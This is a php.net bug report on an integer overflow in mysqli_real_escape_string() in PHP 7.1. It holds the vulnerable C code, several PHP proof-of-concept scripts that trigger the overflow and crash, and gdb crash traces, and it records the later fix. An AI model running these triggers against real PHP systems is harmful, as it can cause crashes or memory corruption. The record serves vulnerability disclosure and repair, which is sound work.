php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74544 Integer overflow in mysqli_real_escape_string()
Submitted: 2017-05-05 04:31 UTC Modified: 2021-08-09 10:49 UTC
Votes:3
Avg. Score:3.7 ± 1.9
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: whitehat002 at hotmail dot com Assigned: cmb (profile)
Status: Closed Package: MySQLi related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: whitehat002 at hotmail dot com
New email:
PHP Version: OS:

 

 [2017-05-05 04:31 UTC] whitehat002 at hotmail dot com
Description:
------------
PHP_FUNCTION(mysqli_real_escape_string) {
	MY_MYSQL	*mysql;
	zval		*mysql_link = NULL;
	char		*escapestr;
	size_t			escapestr_len;
	zend_string *newstr;

	if (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), "Os", &mysql_link, mysqli_link_class_entry, &escapestr, &escapestr_len) == FAILURE) {
		return;
	}
	MYSQLI_FETCH_RESOURCE_CONN(mysql, mysql_link, MYSQLI_STATUS_VALID);

	newstr = zend_string_alloc(2 * escapestr_len, 0);  //integer overflow
	ZSTR_LEN(newstr) = mysql_real_escape_string(mysql->mysql, ZSTR_VAL(newstr), escapestr, escapestr_len);
	newstr = zend_string_truncate(newstr, ZSTR_LEN(newstr), 0);

	RETURN_NEW_STR(newstr);
}

Test script:
---------------
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AAAAA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>


Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.4/sapi/cli/php -n poc2.php
Reading symbols from /root/php-7.1.4/sapi/cli/php...done.
(gdb) b mysqli_api.c:1968
Breakpoint 1 at 0x81ddbdc: file /root/php-7.1.4/ext/mysqli/mysqli_api.c, line 1968.
(gdb) r
Starting program: /root/php-7.1.4/sapi/cli/php -n poc2.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_mysqli_real_escape_string (execute_data=0xb70130f0, 
    return_value=0xbfffc100) at /root/php-7.1.4/ext/mysqli/mysqli_api.c:1968
1968		newstr = zend_string_alloc(2 * escapestr_len, 0);
(gdb) p/x escapestr_len
$1 = 0x80000004
(gdb) p/x 2*escapestr_len
$2 = 0x8


Patches

bug74544.diff (last revision 2017-07-24 10:11 UTC by johannes at schlueters dot de)

Pull Requests

Pull requests:

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-09 08:17 UTC] whitehat002 at hotmail dot com
In php-7.0.1,I take this script ot test.Then,it crash.In others,it does not.I do not know why the same code will have different results.
_____________________________________________________________________

<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7ffffff0);
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>
_____________________________________________________________________

hackyzh@ubuntu:~/Downloads$ gdb -q --args ./php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
Reading symbols from /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php...done.
(gdb) r
Starting program: /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Warning: String is not zero-terminated (@��) (source: /home/hackyzh/Downloads/php-7.0.1/Zend/zend_vm_execute.h:858) in /home/hackyzh/Desktop/poc.php on line 6
[Tue May  9 16:11:53 2017]  Script:  '/home/hackyzh/Desktop/poc.php'

Program received signal SIGSEGV, Segmentation fault.
0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
993							s_len = strlen(s);
(gdb) bt
#0  0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
#1  0x08475719 in strx_printv (ccp=0xbfffc9b8, 
    buf=0xbfffda4c "Tue May  9 16:11:53 2017", len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9dc "\377\377\377\377")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1248
#2  0x08475817 in ap_php_snprintf (buf=0xbfffda4c "Tue May  9 16:11:53 2017", 
    len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1293
#3  0x08471625 in php_message_handler_for_zend (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1435
#4  0x084eca9e in zend_message_dispatcher (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend.c:999
#5  0x084c1af9 in zend_mm_check_leaks (heap=0xb7000040)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2121
#6  0x084c1d99 in zend_mm_shutdown (heap=0xb7000040, full=0, silent=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2193
#7  0x084c2acf in shutdown_memory_manager (silent=0, full_shutdown=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2629
#8  0x0847204d in php_request_shutdown (dummy=0x0)
---Type <return> to continue, or q <return> to quit---
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1833
#9  0x08598c13 in do_cli (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1142
#10 0x0859942a in main (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1345
 [2017-05-11 09:17 UTC] whitehat002 at hotmail dot com
I found a way to make it crash.It seems to be able to execute remote code.
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$v=$mysqli->real_escape_string($str); 
$mysqli->query($v);           
?>
_______________________________________________________
Program received signal SIGSEGV, Segmentation fault.
0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
#1  0x08349eaf in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349a4b in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=4294967295, silent=0 '\000', connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x83422a0 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x08358e6c in mysqlnd_com_query_run (cmd=0xb70543d8)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x08342040 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=4294967295, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344a04 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=4294967295, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=4294967295) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e391a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.4/ext/mysqli/mysqli_nonapi.c:593
#8  0x084558e3 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
---Type <return> to continue, or q <return> to quit---
    at /root/php-7.1.4/Zend/zend_vm_execute.h:970
#9  0x084093be in execute_ex (ex=0xb7013020)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:432
#10 0x0845770f in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:474
#11 0x083c15c0 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /root/php-7.1.4/Zend/zend.c:1476
#12 0x08362a0d in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.4/main/main.c:2537
#13 0x08459824 in do_cli (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:1381
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
-PHP Version: 7.1.4 +PHP Version: 7.1.5
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
In new php version,it also has the same bug.
 [2017-05-15 09:44 UTC] whitehat002 at hotmail dot com
Has anyone solved it?
 [2017-05-17 08:14 UTC] whitehat002 at hotmail dot com
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0xb719409b --> 0x0 
EBX: 0xb7ab0000 --> 0x1abda8 
ECX: 0xffe6df64 
EDX: 0xb71fffa0 --> 0x0 
ESI: 0xb7002050 --> 0xb7061600 --> 0x5e ('^')
EDI: 0xb70600f0 --> 0xb706e000 --> 0x2000000 
EBP: 0x57f7 
ESP: 0xbfffbef8 --> 0xffffffff 
EIP: 0xb7a3a666 (<__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6)
EFLAGS: 0x210282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7a3a657 <__memcpy_ssse3_rep+3495>:	movntdq XMMWORD PTR [edx+0x30],xmm3
   0xb7a3a65c <__memcpy_ssse3_rep+3500>:	movntdq XMMWORD PTR [edx+0x40],xmm4
   0xb7a3a661 <__memcpy_ssse3_rep+3505>:	movntdq XMMWORD PTR [edx+0x50],xmm5
=> 0xb7a3a666 <__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6
   0xb7a3a66b <__memcpy_ssse3_rep+3515>:	movntdq XMMWORD PTR [edx+0x70],xmm7
   0xb7a3a670 <__memcpy_ssse3_rep+3520>:	lea    edx,[edx+0x80]
   0xb7a3a676 <__memcpy_ssse3_rep+3526>:	
    jae    0xb7a3a605 <__memcpy_ssse3_rep+3413>
   0xb7a3a678 <__memcpy_ssse3_rep+3528>:	add    ecx,0x80
[------------------------------------stack-------------------------------------]
0000| 0xbfffbef8 --> 0xffffffff 
0004| 0xbfffbefc --> 0x834a14f (<php_mysqlnd_cmd_write+543>:	mov    edx,DWORD PTR [esp+0x2c])
0008| 0xbfffbf00 --> 0xb706e005 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0012| 0xbfffbf04 --> 0xb7002080 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0016| 0xbfffbf08 --> 0xffffffff 
0020| 0xbfffbf0c --> 0x8348267 (<_mysqlnd_pecalloc+151>:	jmp    0x8348211 <_mysqlnd_pecalloc+65>)
0024| 0xbfffbf10 --> 0x4 
0028| 0xbfffbf14 --> 0xb7054478 ("toor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
1300	../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
#1  0x0834a14f in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349ceb in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=0xffffffff, silent=0x0, connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x8342540 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x0835910c in mysqlnd_com_query_run (cmd=0xb70544b0)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x083422e0 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=0xffffffff, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344ca4 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=0xffffffff, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=0xffffffff) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e3b1a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.5/ext/mysqli/mysqli_nonapi.c:593
#8  0x08455c93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:970
#9  0x0840969e in execute_ex (ex=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:432
#10 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:474
#11 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
    at /root/php-7.1.5/Zend/zend.c:1476
#12 0x08362cad in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.5/main/main.c:2537
#13 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:1381
#15 0xb791daf3 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#16 0x08078641 in _start ()
——————————————————————————————————————————————————————
It seems to lead to buffer overflow.
 [2017-06-20 06:21 UTC] stas@php.net
-Type: Security +Type: Bug
 [2021-08-09 10:49 UTC] cmb@php.net
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
 [2021-08-09 10:50 UTC] cmb@php.net
The following pull request has been associated:

Patch Name: Fix #74544: Integer overflow in mysqli_real_escape_string()
On GitHub:  https://github.com/php/php-src/pull/7353
Patch:      https://github.com/php/php-src/pull/7353.patch
 [2021-08-09 22:09 UTC] git@php.net
Automatic comment on behalf of cmb69
Revision: https://github.com/php/php-src/commit/5977610de1aa87630e40a299a2d90fb7cd00bf7c
Log: Fix #74544: Integer overflow in mysqli_real_escape_string()
 [2021-08-09 22:09 UTC] git@php.net
-Status: Verified +Status: Closed
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Sep 18 04:01:27 2024 UTC